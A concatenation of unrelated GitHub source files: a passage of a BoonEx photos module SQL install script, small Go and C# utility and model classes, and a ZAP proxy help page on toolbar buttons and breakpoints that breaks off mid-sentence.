`sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_view', 'bx_photos', '_bx_photos_menu_set_title_view_entry', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_view', 'bx_photos', 'edit-photo', '_bx_photos_menu_item_title_system_edit_entry', '_bx_photos_menu_item_title_edit_entry', 'page.php?i=edit-photo&id={content_id}', '', '', 'pencil-alt', '', 2147483647, 1, 0, 1), ('bx_photos_view', 'bx_photos', 'delete-photo', '_bx_photos_menu_item_title_system_delete_entry', '_bx_photos_menu_item_title_delete_entry', 'page.php?i=delete-photo&id={content_id}', '', '', 'remove', '', 2147483647, 1, 0, 2); -- MENU: all actions menu for view entry INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_actions', '_sys_menu_title_view_actions', 'bx_photos_view_actions', 'bx_photos', 15, 0, 1, 'BxPhotosMenuViewActions', 'modules/boonex/photos/classes/BxPhotosMenuViewActions.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_view_actions', 'bx_photos', '_sys_menu_set_title_view_actions', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `addon`, `submenu_object`, `submenu_popup`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_view_actions', 'bx_photos', 'edit-photo', '_bx_photos_menu_item_title_system_edit_entry', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 10), ('bx_photos_view_actions', 'bx_photos', 'delete-photo', '_bx_photos_menu_item_title_system_delete_entry', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 20), ('bx_photos_view_actions', 'bx_photos', 'comment', '_sys_menu_item_title_system_va_comment', '', '', '', '', '', '', '', 0, 2147483647, 0, 0, 200), ('bx_photos_view_actions', 'bx_photos', 'view', '_sys_menu_item_title_system_va_view', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 210), ('bx_photos_view_actions', 'bx_photos', 'vote', '_sys_menu_item_title_system_va_vote', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 220), ('bx_photos_view_actions', 'bx_photos', 'score', '_sys_menu_item_title_system_va_score', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 230), ('bx_photos_view_actions', 'bx_photos', 'favorite', '_sys_menu_item_title_system_va_favorite', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 240), ('bx_photos_view_actions', 'bx_photos', 'feature', '_sys_menu_item_title_system_va_feature', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 250), ('bx_photos_view_actions', 'bx_photos', 'repost', '_sys_menu_item_title_system_va_repost', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 260), ('bx_photos_view_actions', 'bx_photos', 'report', '_sys_menu_item_title_system_va_report', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 270), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-facebook', '_sys_menu_item_title_system_social_sharing_facebook', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 300), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-googleplus', '_sys_menu_item_title_system_social_sharing_googleplus', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 310), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-twitter', '_sys_menu_item_title_system_social_sharing_twitter', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 320), ('bx_photos_view_actions', 'bx_photos', 'social-sharing-pinterest', '_sys_menu_item_title_system_social_sharing_pinterest', '', '', '', '', '', '', '', 0, 2147483647, 1, 0, 330), ('bx_photos_view_actions', 'bx_photos', 'more-auto', '_sys_menu_item_title_system_va_more_auto', '_sys_menu_item_title_va_more_auto', 'javascript:void(0)', '', '', 'ellipsis-v', '', '', 0, 2147483647, 1, 0, 9999); -- MENU: actions menu for my entries INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_my', '_bx_photos_menu_title_entries_my', 'bx_photos_my', 'bx_photos', 9, 0, 1, 'BxPhotosMenu', 'modules/boonex/photos/classes/BxPhotosMenu.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_my', 'bx_photos', '_bx_photos_menu_set_title_entries_my', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_my', 'bx_photos', 'create-photo', '_bx_photos_menu_item_title_system_create_entry', '_bx_photos_menu_item_title_create_entry', 'page.php?i=create-photo', '', '', 'plus', '', 2147483647, 1, 0, 0); -- MENU: module sub-menu INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_submenu', '_bx_photos_menu_title_submenu', 'bx_photos_submenu', 'bx_photos', 8, 0, 1, '', ''); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_submenu', 'bx_photos', '_bx_photos_menu_set_title_submenu', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_submenu', 'bx_photos', 'photos-home', '_bx_photos_menu_item_title_system_entries_public', '_bx_photos_menu_item_title_entries_public', 'page.php?i=photos-home', '', '', '', '', 2147483647, 1, 1, 1), ('bx_photos_submenu', 'bx_photos', 'photos-popular', '_bx_photos_menu_item_title_system_entries_popular', '_bx_photos_menu_item_title_entries_popular', 'page.php?i=photos-popular', '', '', '', '', 2147483647, 1, 1, 2), ('bx_photos_submenu', 'bx_photos', 'photos-search', '_bx_photos_menu_item_title_system_entries_search', '_bx_photos_menu_item_title_entries_search', 'page.php?i=photos-search', '', '', '', '', 2147483647, 1, 1, 3), ('bx_photos_submenu', 'bx_photos', 'photos-manage', '_bx_photos_menu_item_title_system_entries_manage', '_bx_photos_menu_item_title_entries_manage', 'page.php?i=photos-manage', '', '', '', '', 2147483646, 1, 1, 4); -- MENU: sub-menu for view entry INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_view_submenu', '_bx_photos_menu_title_view_entry_submenu', 'bx_photos_view_submenu', 'bx_photos', 8, 0, 1, 'BxPhotosMenuView', 'modules/boonex/photos/classes/BxPhotosMenuView.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_view_submenu', 'bx_photos', '_bx_photos_menu_set_title_view_entry_submenu', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('bx_photos_view_submenu', 'bx_photos', 'view-photo', '_bx_photos_menu_item_title_system_view_entry', '_bx_photos_menu_item_title_view_entry_submenu_entry', 'page.php?i=view-photo&id={content_id}', '', '', '', '', 2147483647, 0, 0, 1), ('bx_photos_view_submenu', 'bx_photos', 'view-photo-comments', '_bx_photos_menu_item_title_system_view_entry_comments', '_bx_photos_menu_item_title_view_entry_submenu_comments', 'page.php?i=view-photo-comments&id={content_id}', '', '', '', '', 2147483647, 0, 0, 2); -- MENU: custom menu for snippet meta info INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_snippet_meta', '_sys_menu_title_snippet_meta', 'bx_photos_snippet_meta', 'bx_photos', 15, 0, 1, 'BxPhotosMenuSnippetMeta', 'modules/boonex/photos/classes/BxPhotosMenuSnippetMeta.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_snippet_meta', 'bx_photos', '_sys_menu_set_title_snippet_meta', 0); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `editable`, `order`) VALUES ('bx_photos_snippet_meta', 'bx_photos', 'date', '_sys_menu_item_title_system_sm_date', '_sys_menu_item_title_sm_date', '', '', '', '', '', 2147483647, 0, 0, 1, 1), ('bx_photos_snippet_meta', 'bx_photos', 'rating', '_sys_menu_item_title_system_sm_rating', '_sys_menu_item_title_sm_rating', '', '', '', '', '', 2147483647, 1, 0, 1, 2), ('bx_photos_snippet_meta', 'bx_photos', 'author', '_sys_menu_item_title_system_sm_author', '_sys_menu_item_title_sm_author', '', '', '', '', '', 2147483647, 0, 0, 1, 3), ('bx_photos_snippet_meta', 'bx_photos', 'category', '_sys_menu_item_title_system_sm_category', '_sys_menu_item_title_sm_category', '', '', '', '', '', 2147483647, 0, 0, 1, 4), ('bx_photos_snippet_meta', 'bx_photos', 'tags', '_sys_menu_item_title_system_sm_tags', '_sys_menu_item_title_sm_tags', '', '', '', '', '', 2147483647, 0, 0, 1, 5), ('bx_photos_snippet_meta', 'bx_photos', 'views', '_sys_menu_item_title_system_sm_views', '_sys_menu_item_title_sm_views', '', '', '', '', '', 2147483647, 0, 0, 1, 6), ('bx_photos_snippet_meta', 'bx_photos', 'comments', '_sys_menu_item_title_system_sm_comments', '_sys_menu_item_title_sm_comments', '', '', '', '', '', 2147483647, 1, 0, 1, 7); -- MENU: profile stats SET @iNotifMenuOrder = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_menu_items` WHERE `set_name` = 'sys_profile_stats' AND `active` = 1 LIMIT 1); INSERT INTO `sys_menu_items` (`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `addon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_profile_stats', 'bx_photos', 'profile-stats-manage-photos', '_bx_photos_menu_item_title_system_manage_my_photos', '_bx_photos_menu_item_title_manage_my_photos', 'page.php?i=photos-manage', '', '_self', 'camera-retro col-blue1', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:41:"get_menu_addon_manage_tools_profile_stats";}', '', 2147483646, 1, 0, @iNotifMenuOrder + 1); -- MENU: manage tools submenu INSERT INTO `sys_objects_menu`(`object`, `title`, `set_name`, `module`, `template_id`, `deletable`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_menu_manage_tools', '_bx_photos_menu_title_manage_tools', 'bx_photos_menu_manage_tools', 'bx_photos', 6, 0, 1, 'BxPhotosMenuManageTools', 'modules/boonex/photos/classes/BxPhotosMenuManageTools.php'); INSERT INTO `sys_menu_sets`(`set_name`, `module`, `title`, `deletable`) VALUES ('bx_photos_menu_manage_tools', 'bx_photos', '_bx_photos_menu_set_title_manage_tools', 0); --INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES --('bx_photos_menu_manage_tools', 'bx_photos', 'delete-with-content', '_bx_photos_menu_item_title_system_delete_with_content', '_bx_photos_menu_item_title_delete_with_content', 'javascript:void(0)', 'javascript:{js_object}.onClickDeleteWithContent({content_id});', '_self', 'far trash-alt', '', 128, 1, 0, 0); -- MENU: dashboard manage tools SET @iManageMenuOrder = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_menu_items` WHERE `set_name`='sys_account_dashboard_manage_tools' LIMIT 1); INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `addon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('sys_account_dashboard_manage_tools', 'bx_photos', 'photos-administration', '_bx_photos_menu_item_title_system_admt_photos', '_bx_photos_menu_item_title_admt_photos', 'page.php?i=photos-administration', '', '_self', '', 'a:2:{s:6:"module";s:9:"bx_photos";s:6:"method";s:27:"get_menu_addon_manage_tools";}', '', 192, 1, 0, @iManageMenuOrder + 1); -- MENU: add menu item to profiles modules (trigger* menu sets are processed separately upon modules enable/disable) INSERT INTO `sys_menu_items`(`set_name`, `module`, `name`, `title_system`, `title`, `link`, `onclick`, `target`, `icon`, `submenu_object`, `visible_for_levels`, `active`, `copyable`, `order`) VALUES ('trigger_profile_view_submenu', 'bx_photos', 'photos-author', '_bx_photos_menu_item_title_system_view_entries_author', '_bx_photos_menu_item_title_view_entries_author', 'page.php?i=photos-author&profile_id={profile_id}', '', '', 'camera-retro col-blue1', '', 2147483647, 1, 0, 0), ('trigger_group_view_submenu', 'bx_photos', 'photos-context', '_bx_photos_menu_item_title_system_view_entries_in_context', '_bx_photos_menu_item_title_view_entries_in_context', 'page.php?i=photos-context&profile_id={profile_id}', '', '', 'camera-retro col-blue1', '', 2147483647, 1, 0, 0); -- PRIVACY INSERT INTO `sys_objects_privacy` (`object`, `module`, `action`, `title`, `default_group`, `table`, `table_field_id`, `table_field_author`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_allow_view_to', 'bx_photos', 'view', '_bx_photos_form_entry_input_allow_view_to', '3', 'bx_photos_entries', 'id', 'author', 'BxPhotosPrivacy', 'modules/boonex/photos/classes/BxPhotosPrivacy.php'); -- ACL INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'create entry', NULL, '_bx_photos_acl_action_create_entry', '', 1, 3); SET @iIdActionEntryCreate = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'delete entry', NULL, '_bx_photos_acl_action_delete_entry', '', 1, 3); SET @iIdActionEntryDelete = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'view entry', NULL, '_bx_photos_acl_action_view_entry', '', 1, 0); SET @iIdActionEntryView = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'set thumb', NULL, '_bx_photos_acl_action_set_thumb', '', 1, 3); SET @iIdActionSetThumb = LAST_INSERT_ID(); INSERT INTO `sys_acl_actions` (`Module`, `Name`, `AdditionalParamName`, `Title`, `Desc`, `Countable`, `DisabledForLevels`) VALUES ('bx_photos', 'edit any entry', NULL, '_bx_photos_acl_action_edit_any_entry', '', 1, 3); SET @iIdActionEntryEditAny = LAST_INSERT_ID(); SET @iUnauthenticated = 1; SET @iAccount = 2; SET @iStandard = 3; SET @iUnconfirmed = 4; SET @iPending = 5; SET @iSuspended = 6; SET @iModerator = 7; SET @iAdministrator = 8; SET @iPremium = 9; INSERT INTO `sys_acl_matrix` (`IDLevel`, `IDAction`) VALUES -- entry create (@iStandard, @iIdActionEntryCreate), (@iModerator, @iIdActionEntryCreate), (@iAdministrator, @iIdActionEntryCreate), (@iPremium, @iIdActionEntryCreate), -- entry delete (@iStandard, @iIdActionEntryDelete), (@iModerator, @iIdActionEntryDelete), (@iAdministrator, @iIdActionEntryDelete), (@iPremium, @iIdActionEntryDelete), -- entry view (@iUnauthenticated, @iIdActionEntryView), (@iAccount, @iIdActionEntryView), (@iStandard, @iIdActionEntryView), (@iUnconfirmed, @iIdActionEntryView), (@iPending, @iIdActionEntryView), (@iModerator, @iIdActionEntryView), (@iAdministrator, @iIdActionEntryView), (@iPremium, @iIdActionEntryView), -- set entry thumb (@iStandard, @iIdActionSetThumb), (@iModerator, @iIdActionSetThumb), (@iAdministrator, @iIdActionSetThumb), (@iPremium, @iIdActionSetThumb), -- edit any entry (@iModerator, @iIdActionEntryEditAny), (@iAdministrator, @iIdActionEntryEditAny); -- SEARCH SET @iSearchOrder = (SELECT IFNULL(MAX(`Order`), 0) FROM `sys_objects_search`); INSERT INTO `sys_objects_search` (`ObjectName`, `Title`, `Order`, `ClassName`, `ClassPath`) VALUES ('bx_photos', '_bx_photos', @iSearchOrder + 1, 'BxPhotosSearchResult', 'modules/boonex/photos/classes/BxPhotosSearchResult.php'), ('bx_photos_cmts', '_bx_photos_cmts', @iSearchOrder + 2, 'BxPhotosCmtsSearchResult', 'modules/boonex/photos/classes/BxPhotosCmtsSearchResult.php'); -- METATAGS INSERT INTO `sys_objects_metatags` (`object`, `table_keywords`, `table_locations`, `table_mentions`, `override_class_name`, `override_class_file`) VALUES ('bx_photos', 'bx_photos_meta_keywords', 'bx_photos_meta_locations', 'bx_photos_meta_mentions', '', ''); -- CATEGORY INSERT INTO `sys_objects_category` (`object`, `search_object`, `form_object`, `list_name`, `table`, `field`, `join`, `where`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_cats', 'bx_photos', 'bx_photos', 'bx_photos_cats', 'bx_photos_entries', 'cat', 'INNER JOIN `sys_profiles` ON (`sys_profiles`.`id` = `bx_photos_entries`.`author`)', 'AND `sys_profiles`.`status` = ''active''', '', ''); -- STATS SET @iMaxOrderStats = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_statistics`); INSERT INTO `sys_statistics` (`module`, `name`, `title`, `link`, `icon`, `query`, `order`) VALUES ('bx_photos', 'bx_photos', '_bx_photos', 'page.php?i=photos-home', 'camera-retro col-blue1', 'SELECT COUNT(*) FROM `bx_photos_entries` WHERE 1 AND `status` = ''active'' AND `status_admin` = ''active''', @iMaxOrderStats + 1); -- CHARTS SET @iMaxOrderCharts = (SELECT IFNULL(MAX(`order`), 0) FROM `sys_objects_chart`); INSERT INTO `sys_objects_chart` (`object`, `title`, `table`, `field_date_ts`, `field_date_dt`, `field_status`, `query`, `active`, `order`, `class_name`, `class_file`) VALUES ('bx_photos_growth', '_bx_photos_chart_growth', 'bx_photos_entries', 'added', '', 'status,status_admin', '', 1, @iMaxOrderCharts + 1, 'BxDolChartGrowth', ''), ('bx_photos_growth_speed', '_bx_photos_chart_growth_speed', 'bx_photos_entries', 'added', '', 'status,status_admin', '', 1, @iMaxOrderCharts + 2, 'BxDolChartGrowthSpeed', ''); -- GRIDS: moderation tools INSERT INTO `sys_objects_grid` (`object`, `source_type`, `source`, `table`, `field_id`, `field_order`, `field_active`, `paginate_url`, `paginate_per_page`, `paginate_simple`, `paginate_get_start`, `paginate_get_per_page`, `filter_fields`, `filter_fields_translatable`, `filter_mode`, `sorting_fields`, `sorting_fields_translatable`, `visible_for_levels`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_administration', 'Sql', 'SELECT * FROM `bx_photos_entries` WHERE 1 ', 'bx_photos_entries', 'id', 'added', 'status_admin', '', 20, NULL, 'start', '', 'title,text', '', 'like', 'reports', '', 192, 'BxPhotosGridAdministration', 'modules/boonex/photos/classes/BxPhotosGridAdministration.php'), ('bx_photos_common', 'Sql', 'SELECT * FROM `bx_photos_entries` WHERE 1 ', 'bx_photos_entries', 'id', 'added', 'status', '', 20, NULL, 'start', '', 'title,text', '', 'like', '', '', 2147483647, 'BxPhotosGridCommon', 'modules/boonex/photos/classes/BxPhotosGridCommon.php'); INSERT INTO `sys_grid_fields` (`object`, `name`, `title`, `width`, `translatable`, `chars_limit`, `params`, `order`) VALUES ('bx_photos_administration', 'checkbox', '_sys_select', '2%', 0, '', '', 1), ('bx_photos_administration', 'switcher', '_bx_photos_grid_column_title_adm_active', '8%', 0, '', '', 2), ('bx_photos_administration', 'reports', '_sys_txt_reports_title', '5%', 0, '', '', 3), ('bx_photos_administration', 'title', '_bx_photos_grid_column_title_adm_title', '25%', 0, '25', '', 4), ('bx_photos_administration', 'added', '_bx_photos_grid_column_title_adm_added', '20%', 1, '25', '', 5), ('bx_photos_administration', 'author', '_bx_photos_grid_column_title_adm_author', '20%', 0, '25', '', 6), ('bx_photos_administration', 'actions', '', '20%', 0, '', '', 7), ('bx_photos_common', 'checkbox', '_sys_select', '2%', 0, '', '', 1), ('bx_photos_common', 'switcher', '_bx_photos_grid_column_title_adm_active', '8%', 0, '', '', 2), ('bx_photos_common', 'title', '_bx_photos_grid_column_title_adm_title', '40%', 0, '35', '', 3), ('bx_photos_common', 'added', '_bx_photos_grid_column_title_adm_added', '30%', 1, '25', '', 4), ('bx_photos_common', 'actions', '', '20%', 0, '', '', 5); INSERT INTO `sys_grid_actions` (`object`, `type`, `name`, `title`, `icon`, `icon_only`, `confirm`, `order`) VALUES ('bx_photos_administration', 'bulk', 'delete', '_bx_photos_grid_action_title_adm_delete', '', 0, 1, 1), ('bx_photos_administration', 'single', 'edit', '_bx_photos_grid_action_title_adm_edit', 'pencil-alt', 1, 0, 1), ('bx_photos_administration', 'single', 'delete', '_bx_photos_grid_action_title_adm_delete', 'remove', 1, 1, 2), ('bx_photos_administration', 'single', 'settings', '_bx_photos_grid_action_title_adm_more_actions', 'cog', 1, 0, 3), ('bx_photos_common', 'bulk', 'delete', '_bx_photos_grid_action_title_adm_delete', '', 0, 1, 1), ('bx_photos_common', 'single', 'edit', '_bx_photos_grid_action_title_adm_edit', 'pencil-alt', 1, 0, 1), ('bx_photos_common', 'single', 'delete', '_bx_photos_grid_action_title_adm_delete', 'remove', 1, 1, 2), ('bx_photos_common', 'single', 'settings', '_bx_photos_grid_action_title_adm_more_actions', 'cog', 1, 0, 3); -- UPLOADERS INSERT INTO `sys_objects_uploader` (`object`, `active`, `override_class_name`, `override_class_file`) VALUES ('bx_photos_simple', 1, 'BxPhotosUploaderSimple', 'modules/boonex/photos/classes/BxPhotosUploaderSimple.php'), ('bx_photos_html5', 1, 'BxPhotosUploaderHTML5', 'modules/boonex/photos/classes/BxPhotosUploaderHTML5.php'); -- ALERTS INSERT INTO `sys_alerts_handlers` (`name`, `class`, `file`, `service_call`) VALUES ('bx_photos', 'BxPhotosAlertsResponse', 'modules/boonex/photos/classes/BxPhotosAlertsResponse.php', ''); SET @iHandler := LAST_INSERT_ID(); INSERT INTO `sys_alerts` (`unit`, `action`, `handler_id`) VALUES ('system', 'save_setting', @iHandler), ('profile', 'delete', @iHandler);
{ "pile_set_name": "Github" }
package utils import ( "encoding/json" "fmt" "io/ioutil" "os" "path" ) const ( assetFileName = "asset-manifest.json" ) // ResourceMapper maps path to a static resource built by react type ResourceMapper struct { assetMap map[string]string } // NewResourceMapper creates a new resource mapper func NewResourceMapper(buildPath string) (mapper ResourceMapper) { filePath := path.Join(buildPath, assetFileName) jsonFile, err := os.Open(filePath) if err != nil { // keep quiet for now fmt.Printf("failed to read asset-manifest for resource mapper from %s\n", filePath) return } byteValue, _ := ioutil.ReadAll(jsonFile) err = jsonFile.Close() if err != nil { // keep quiet for now return } var assetMap map[string]string err = json.Unmarshal([]byte(byteValue), &assetMap) if err != nil { // keep quiet for now return } return ResourceMapper{ assetMap: assetMap, } } // Map returns physical path of resource func (m ResourceMapper) Map(assetName string) (string, error) { if v, ok := m.assetMap[assetName]; ok { return v, nil } return "", fmt.Errorf("failed to get resource path for %s", assetName) }
{ "pile_set_name": "Github" }
/** * (C) Copyright IBM Corp. 2018, 2019. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * */ using Newtonsoft.Json; namespace IBM.Watson.CompareComply.v1.Model { /// <summary> /// The table's section title, if identified. /// </summary> public class SectionTitle { /// <summary> /// The text of the section title, if identified. /// </summary> [JsonProperty("text", NullValueHandling = NullValueHandling.Ignore)] public string Text { get; set; } /// <summary> /// The numeric location of the identified element in the document, represented with two integers labeled /// `begin` and `end`. /// </summary> [JsonProperty("location", NullValueHandling = NullValueHandling.Ignore)] public Location Location { get; set; } } }
{ "pile_set_name": "Github" }
package extra import ( "github.com/json-iterator/go" "unicode" ) // SupportPrivateFields include private fields when encoding/decoding func SupportPrivateFields() { jsoniter.RegisterExtension(&privateFieldsExtension{}) } type privateFieldsExtension struct { jsoniter.DummyExtension } func (extension *privateFieldsExtension) UpdateStructDescriptor(structDescriptor *jsoniter.StructDescriptor) { for _, binding := range structDescriptor.Fields { isPrivate := unicode.IsLower(rune(binding.Field.Name[0])) if isPrivate { binding.FromNames = []string{binding.Field.Name} binding.ToNames = []string{binding.Field.Name} } } }
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title> Top Level Toolbar </title> </head> <body bgcolor="#ffffff"> <h1>Top Level Toolbar</h1> <p> This toolbar provides a set of controls for commonly used functionality. <h2>Mode pulldown</h2> This allows you to change the current <a href="../start/concepts/modes.html">mode</a>. <h2><img src="../images/16/171.png" align="bottom" width="16" height="16" />&nbsp; New Session</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'New Session' menu item. <h2><img src="../images/16/047.png" align="bottom" width="16" height="16" />&nbsp; Open Session</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Open Session' menu item. <h2><img src="../images/16/096.png" align="bottom" width="16" height="16" />&nbsp; Persist Session...</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Persist Session...' menu item. <h2><img src="../images/fugue/camera.png" align="bottom" width="16" height="16" />&nbsp; Snapshot Session</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Snapshot Session' menu item. <h2><img src="../images/16/024.png" align="bottom" width="16" height="16" />&nbsp; Session Properties...</h2> This button is the same as the <a href="tlmenu/file.html">File menu</a> 'Properties...' menu item. <h2><img src="../images/16/041.png" align="bottom" width="16" height="16" />&nbsp; Options...</h2> This button is the same as the <a href="tlmenu/tools.html">Tools menu</a> 'Options...' menu item. <h2><img src="../images/fugue/ui-tab-show.png" align="bottom" width="16" height="16" />&nbsp; Show all tabs</h2> This button reveals all of the hidden tabs. <h2><img src="../images/fugue/ui-tab-hide.png" align="bottom" width="16" height="16" />&nbsp; Hide unpinned tabs</h2> This button hides all of the tabs that are 'unpinned'. Tabs can be pinned and unpinned via the small 'pin' icon that is shown when the tab is selected. <h2><img src="../images/ui_tab_text.png" align="bottom" width="16" height="16" />&nbsp; Show tab names and icons</h2> This button toggles the displaying of the tab names. <h2><img src="../images/expand_sites.png" align="bottom" width="16" height="16" />&nbsp; Expand Sites Tab</h2> This changes the display so that the 'tree' window containing the Sites tab extends for the full length of the left hand side.<br> This will reduce the amount of space available to the 'information' window. <h2><img src="../images/expand_info.png" align="bottom" width="16" height="16" />&nbsp; Expand Information Tabs</h2> This changes the display so that the 'information' window extends for the full length of the bottom.<br> This will reduce the amount of space available to the 'tree' window. <h2><img src="../images/expand_full.png" align="bottom" width="16" height="16" />&nbsp; Full Layout</h2> This changes the display so that the selected tab takes up the full screen.<br> This is useful when using ZAP on small screens. <h2><img src="../images/layout_tabbed.png" align="bottom" width="16" height="16" />&nbsp; Request and Response tabs side by side</h2> This changes the display so that the request and response tabs are side by side.<br> This increases the information that can be displayed but means you cannot see both the request and response at the same time. <h2><img src="../images/layout_vertical_split.png" align="bottom" width="16" height="16" />&nbsp; Request shown above Response</h2> This changes the display so that the request panel is shown above the response panel.<br> This decreases the information that can be displayed but means you can see both the request and response at the same time. <h2><img src="../images/layout_horizontal_split.png" align="bottom" width="16" height="16" />&nbsp; Request and Response panels side by side</h2> This changes the display so that the request panel is shown to the left of the response panel.<br> This decreases the information that can be displayed but means you can see both the request and response at the same time. <h2><img src="../images/16/152.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp; <img src="../images/16/151.png" align="bottom" width="16" height="16" />&nbsp; Set / Unset break on all requests and responses</h2> This sets and unsets a 'global' <a href="../start/concepts/breakpoints.html">break point</a> that will trap and display the next request or response in the <a href="tabs/break.html">Break tab</a>.<br/> You can then change any part of the request or response that you want to and send it to the target application by pressing either of the 'Step' or 'Continue' buttons.<br/> Alternatively you can press the 'Drop' button to dispose of the request or response.<br/> You can switch between a single 'combined' break button and separates ones for requests and responses via the <a href="dialogs/options/breakpoints.html">Options breakpoints screen</a> <h2><img src="../images/16/105.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp; <img src="../images/16/105r.png" align="bottom" width="16" height="16" />&nbsp; Set / Unset break on all requests</h2> This sets and unsets a 'global' <a href="../start/concepts/breakpoints.html">break point</a> that will trap and display the next request in the <a href="tabs/break.html">Break tab</a>.<br/> You can then change any part of the request that you want to and send it to the target application by pressing either of the 'Step' or 'Continue' buttons.<br/> Alternatively you can press the 'Drop' button to dispose of the request.<br/> You can switch between a single 'combined' break button and separates ones for requests and responses via the <a href="dialogs/options/breakpoints.html">Options breakpoints screen</a> <h2><img src="../images/16/106.png" align="bottom" width="16" height="16" />&nbsp;/&nbsp; <img src="../images/16/106r.png" align="bottom" width="16" height="16" />&nbsp; Set / Unset break on all responses</h2> This sets and unsets a 'global' <a href="../start/concepts/breakpoints.html">break point</a> that will trap and display the next response in the <a href="tabs/break.html">Break tab</a>.<br/> You can then change any part of the response that you want to and send it to your browser by pressing either of the 'Step' or 'Continue' buttons.<br/> Alternatively you can press the 'Drop' button to dispose of the request.<br/> You can switch between a single 'combined' break button and 